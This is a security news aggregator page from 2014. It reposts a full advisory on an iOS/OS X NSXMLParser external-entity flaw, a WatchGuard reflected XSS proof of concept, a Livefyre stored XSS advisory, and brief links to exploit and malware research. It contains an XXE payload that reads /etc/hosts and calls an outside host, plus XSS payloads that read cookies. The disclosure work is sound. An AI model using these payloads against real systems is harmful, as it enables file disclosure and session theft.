Apple iOS / OSX Foundation NSXMLParser XML eXternal Entity (XXE) Flaw

September 18, 2014, 12:56 pm
$
0
0

                         VSR Security Advisory
                       http://www.vsecurity.com/

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Advisory Name: Apple Foundation NSXMLParser XML eXternal Entity (XXE) Flaw
 Release Date: 2014-09-17
  Application: Apple iOS Foundation Framework
           Apple OS X Foundation Framework
     Versions: iOS 7.0, 7.1, OS X 10.9 - 10.9.4
     Severity: High
       Author: George D. Gal <ggal (at) vsecurity.com>
Vendor Status: Fix Available
CVE Candidate: CVE-2014-4374
    Reference: http://www.vsecurity.com/resources/advisory/20140917-1/
           http://support.apple.com/kb/HT1222

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Product Description
~-----------------~
- From [1]:
"Xcode includes software development kits (SDKs) that enable you to create
  applications that run on specific versions of iOS or OS X?including
  versions different from the one you are developing on. This technology
  lets you build a single binary that takes advantage of new features when
  running on a system that supports them, and gracefully degrades when
  running on an older system. Some Apple frameworks automatically modify
  their behavior based on the SDK an application is built against for
  improved compatibility."


Vulnerability Overview
~--------------------~
In May 2014, VSR identified a vulnerability in versions 7.0 and 7.1 of
the iOS
SDK whereby the NSXMLParser class, resolves XML External Entities by default
despite documentation which indicates otherwise.  In addition, settings to
change the behavior of XML External Entity resolution appears to be
non-functional.

This vulnerability, commonly known as XXE (XML eXternal Entities) attacks
could allow for an attacker's ability to use the XML parser to carry out
attacks ranging from network port scanning, information disclosure,
denial of service, and potentially to carry out remote file retrieval.

Further review also revealed that the Foundation Framework used in OS X
10.9.x is also vulnerable.

The severity of this vulnerability varies. For example, in situations where
the application does not reflect user influenced XML, retrieval of files
may be limited, however using external HTTP entities could be used to
conduct port scans. In other scenarios if core iOS applications transmit XML
over plaintext protocols, these protocols could potentially be intercepted
to leak contents of any file on the mobile device. For App Store
applications
files which could be accessed may be limited to those under the individual
chrooted application directories, or in the case of jailbroken devices, any
file on the filesystem.


Vulnerability Details
~-------------------~

Apple's NSXMLParser documentation [2] indicates that external entity
resolution is disabled in the parser by default. However, inspection of
multiple applications running on iOS 7.0 and 7.1 now appear to resolve
external entities by default, and even when attempting to disable entity
resolution explicitly as shown below:

    [nsXmlParser setShouldResolveExternalEntities:NO];

The following source code demonstrates the flaw:


- - (void) doParse:(NSData *)data {

    // create and init NSXMLParser object
    NSXMLParser *nsXmlParser = [[NSXMLParser alloc] initWithData:data];

    // Why does the following not even work!?
    [nsXmlParser setShouldResolveExternalEntities:NO];

    // create and init our delegate
    VSRParser *parser = [[VSRParser alloc] initXMLParser];

    // set delegate
    [nsXmlParser setDelegate:parser];

    // parsing...
    BOOL success = [nsXmlParser parse];

    // test the result
    if (success) {
        NSLog(@"No errors");
        NSMutableArray *stuff = [parser tests];

    } else {
        NSLog(@"Error parsing document!");
    }

    [parser release];
    [nsXmlParser release];

}


When using a vulnerable input XML file as shown below, the XML parser
attempts
to perform network name resolution and access the resource defined by &http;

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE roottag [
<!ENTITY http SYSTEM "http://iossdk-xxe.apt.vsecurity.org/">
<!ENTITY file SYSTEM "file:///etc/hosts">
]>
<test>
    <vsr>
        <tag1>&file;</tag1>
        <tag2>&http;</tag2>
    </vsr>
</test>

The following DNS and web server log entries demonstrate attempts to resolve
&http;

2014-05-19_13:26:28.31088 ...  iossdk-xxe.apt.vsecurity.org

XX.XX.XX.XX - - [19/May/2014:09:26:28 -0400] "GET /xxe HTTP/1.0" 404 446
"-" "-"


In more serious exploitation scenarios, plaintext XML communications between
a server and iOS mobile application, or OS X client application could be
intercepted and modified in transit to reference a file present on the
client
device. If the device reflects this value in subsequent communications or
errors the contents of files stored on the device could be leaked to an
attacker

Versions Affected
~---------------~
VSR's analysis revealed that the IOS 7.0, 7.1 SDKs are vulnerable, while
earlier versions of IOS and the IOS SDK do not appear to be affected. This
vulnerability affects the Mac OSX Foundation, however VSR has not verified
the earliest version of the Foundation framework for OSX which is affected.


Vendor Response
~-------------~
The following timeline details Apple's response to the reported issue:

2014-05-19    Apple was provided a draft advisory.
2014-07-10    Apple confirms issues to be fixed in iOS 8 and OSX Yosemite
2014-09-17    Apple releases iOS 8 and OS X 10.9.5 which is presumed to
          fix this vulnerability.


Recommendation
~------------~
This vulnerability will require an updated version of iOS and OS X from
Apple, as even built-in methods for disabling XXE appears to be
non-functional. Users should update their devices to iOS 8 and OS X
Mavericks
10.9.5 with the Software Update [3] mechanism.


Common Vulnerabilities and Exposures (CVE) Information
~----------------------------------------------------~
The Common Vulnerabilities and Exposures (CVE) project has assigned
the number CVE-2014-4374 to this issue.  This is a candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

References:

1.
https://developer.apple.com/library/ios/documentation/DeveloperTools/Conceptual/cross_development/Introduction/Introduction.html#//apple_ref/doc/uid/10000163-BCICHGIE

2.
https://developer.apple.com/library/ios/documentation/Cocoa/Reference/Foundation/Classes/NSXMLParser_Class/Reference/Reference.html

3. http://support.apple.com/kb/HT1222


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

This advisory is distributed for educational purposes only with the sincere
hope that it will help promote public safety.  This advisory comes with
absolutely NO WARRANTY; not even the implied warranty of merchantability or
fitness for a particular purpose.  Neither Virtual Security Research,
LLC nor
the author accepts any liability for any direct, indirect, or consequential
loss or damage arising from use of, or reliance on, this information.

See the VSR disclosure policy for more information on our responsible
disclosure practices:
  http://www.vsecurity.com/company/disclosure

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
     Copyright 2014 Virtual Security Research, LLC.  All rights reserved.

Reflected XSS Attacks vulnerabilities in WatchGuard XTM 11.8.3 (CVE-2014-6413)

September 18, 2014, 12:57 pm
$
0
0
I. VULNERABILITY

Reflected XSS Attacks vulnerabilities in WatchGuard XTM 11.8.3

II. BACKGROUND
-------------------------
WatchGuard builds affordable, all-in-one network and content security
solutions to provide defense in depth for corporate content, networks
and the businesses they power.

III. DESCRIPTION
-------------------------
Has been detected a Reflected XSS vulnerability in XTM WatchGuard.
The code injection is done through the parameter "poll_name" in the
page “/firewall/policy?pol_name=(HERE XSS)”

IV. PROOF OF CONCEPT
-------------------------
The application does not validate the parameter “poll_name” correctly.
https://10.200.210.100:8080/network/dynamic_dns_config?intf=aaaa<scrip
t>alert(document.cookie)</script>

V. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted
user's browser, that allows the execution of arbitrary HTML/script
code to be executed in the contex
t of the victim user's browser allowing Cookie Theft/Session
Hijacking, thus enabling full access the box.

VI. SYSTEMS AFFECTED
-------------------------
Tested WatchGuard XTM Version: 11.8.3 (Build 446065)
VII. SOLUTION
-------------------------
All data received by the application and can be modified by the user,
before making any kind of transaction with them must be validated

By William Costa
william.costa@gmail.com

Malicious iOS Apps

September 18, 2014, 1:40 pm
$
0
0
As part of one of our recent research projects, we evaluated how malicious thid-party apps could affect user privacy, despite the various security controls and the solid security architecture of the iOS platform. Therefore, we reviewed the iOS app sandbox model for weaknesses – and, indeed, made some finds.

more here.............http://www.andreas-kurtz.de/2014/09/malicious-apps-ios8.html

FastResponder

September 18, 2014, 7:19 pm
$
0
0
This tool collects different artefacts on live Windows and records the results in csv files. With the analyses of this artefacts, an early compromission can be detected.

more here..............https://github.com/SekoiaLab/FastResponder

Nuclear exploit kit - complete infection cycle

September 18, 2014, 7:21 pm
$
0
0
Zscaler ThreatLabZ has been seeing a steady increase in the Nuclear Exploit Kit (EK) traffic over the past few weeks. The detection of malicious activity performed by this EK remains low, due to usage of dynamic content and heavy obfuscation. In this blog, we will walk you through a complete Nuclear EK infection cycle with a live example. We will also share details of the identified payload, which had very low Anti-Virus (AV) detection rates.

more here...........http://research.zscaler.com/2014/09/nuclear-exploit-kit-complete-infection.html

Leveraging LFI To Get Full Compromise On WordPress Sites

September 19, 2014, 3:50 am
$
0
0
In this post I will discuss how a serious but mostly ignored vulnerability can lead to a full compromise of a WordPress site. The key in this attack is how WordPress handles authentication allowing a brute force attack if the secret salt and key values stored in wp-config.php are exposed. IF an innocuous LFI (local file inclusion) or accidental leak of this data by a backup or copy of wp-config.php is successful, then an attacker could generate their own valid auth tokens and gain full access to the site’s admin pages without being detected.

more here...........http://blog.spiderlabs.com/2014/09/leveraging-lfi-to-get-full-compromise-on-wordpress-sites.html

Paper: Protecting Encrypted Cookies from Compression Side-Channel Attacks

September 19, 2014, 9:26 am
$
0
0
Compression is desirable for network applications as it saves bandwidth; however, when data is
compressed before being encrypted, the amount of compression leaks information about the amount
of redundancy in the plaintext. This side channel has led to successful real-world attacks (the CRIME
and BREACH attacks) on web traffic protected by the Transport Layer Security (TLS) protocol. The
general guidance in light of these attacks has been to disable compression, preserving confidentiality
but sacrificing bandwidth. In this paper, we examine two techniques—heuristic separation of secrets
and fixed-dictionary compression—for enabling compression while protecting high-value secrets, such as cookies, from attack. We model the security offered by these techniques and report on the amount of compressibility that they can achieve.

more here.............http://eprint.iacr.org/2014/724.pdf
Search

Cross-site scripting (XSS) vulnerability in Xcode Server in CoreCollaboration in Apple OS X Server before 3.2.1

September 19, 2014, 12:04 pm
$
0
0
Cross-site scripting (XSS) vulnerability in Xcode Server in CoreCollaboration in Apple OS X Server before 3.2.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. Cross-Site Scripting (XSS) exploits occur when attacker controlled data is rendered in an unsafe context that is User Agent Dependent.

more here...........http://www.cloudscan.me/2014/09/cve-2014-4406-apple-sa-2014-09-17-5-os.html

Yahoo SQL Injection to Remote Code Exection to Root Privilege

September 20, 2014, 2:58 am
$
0
0
Today I will blog about a SQL Injection vulnerability that were escalated to Remote Code Execution, Escalated to Root Privilege on one of Yahoo servers.

The story started while searching in below domain: http://innovationjockeys.yahoo.net/

while intercepting the POST requests, I found below request that graped my attention with the possibility of SQL Injection.

more here...........http://www.sec-down.com/wordpress/?p=494

FinFisher Malware Dropper Analysis

September 20, 2014, 3:00 am
$
0
0
As you may have heard, recently Finfisher malware sample leaked online. As I got a little free time today, I decided to take a look at it. Sample I'm going to analyze in this article is finfisher1.exe.bin:

MD5: 074919F13D07CD6CE92BB0738971AFC7

SHA: 9F9A18E81E9B39BD2F047004B8E3B4CB0FB505C9

So, at first glance, I noticed it's written in C++ and compiled using Visual Studio 2005. No packer/crypter/obfuscator has been used. So far, FinFisher's performance is disappointing.


more here............https://www.codeandsec.com/FinFisher-Malware-Dropper-Analysis

INTERNET Permission Bypass via Ping Command for Android 2.X (Sep. 2010)

September 20, 2014, 12:26 pm
$
0
0
Although, It was already fixed on Android 4.X, I'd like to write article about this because I think this is very interesting technically.
I reported it to Google Sep. 2010 and be said my report makes no sense and is waste of time :-( But it looks be patched Nov. 2010 for 3.X and 4.X. Actually, I don't know this is still available or not for Android 2.X because I can't find discussion about this on the web. But I think still available on some devices.
I found this bypass on my Xperia SO-01B with Android 1.6. This is my first Android :-)
At that time, most of users' Androids were 2.X or 1.X and were affected by this.


more here..........http://harupuxa.blogspot.jp/2014/09/internet-permission-bypass-via-ping.html

Livefyre LiveComments Plugin - Stored XSS

September 20, 2014, 2:24 pm
$
0
0
Title : Stored XSS in Livefyre LiveComments Plugin
CVE : 2014-6420
Vendor Homepage : http://livefyre.com
Software Link : http://web.livefyre.com/streamhub/#liveComments
Version : v3.0
Author : Brij Kishore Mishra
Date : 03-Sept-2014
Tested On : Chrome 37, Ubuntu 14.04


Description :

This plugin requires user to be signed in via livefyre account to post
comments. Users have the option to upload pictures in comments. This
feature can be easily abused.

Using an intercepting proxy (e.g. Burp Suite), the name variable can be
edited to send an XSS payload while uploading a picture (payload used :
"><img src=x onerror=prompt(1337)>). When the comment is posted, the image
will be successfully uploaded, which leads to XSS due to an unsanitized
field.



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
Viewing all 8064 articles
Browse latest View live
Search